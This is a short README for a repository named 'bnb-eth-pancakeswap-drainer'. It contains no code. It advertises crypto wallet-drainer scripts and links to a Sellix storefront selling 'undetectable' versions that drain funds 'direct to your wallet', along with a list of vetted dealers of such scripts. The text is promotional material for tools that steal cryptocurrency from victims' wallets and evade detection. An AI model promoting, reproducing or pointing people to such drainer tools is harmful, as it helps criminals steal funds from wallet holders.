tr4g1k0/bnb-eth-pancakeswap-drainer/README.md

 ### List of sellix dealers that i have screened https://github.com/moneywithbots/Sellix-id-verified-script-dealers ###

-### THIS FREE SCRIPT IS OFTEN DETECTED FASTER SO FOR DIRECT UNDETECTEDABLE SCRIPTS DIRECT TO YOUR WALLET NO WAIT https://moneywithbots.sellix.io/ ###

 !!!!!!!For direct drain to your wallet with no custom smart contract https://moneywithbots.sellix.io/ !!!!!!!!!!!!!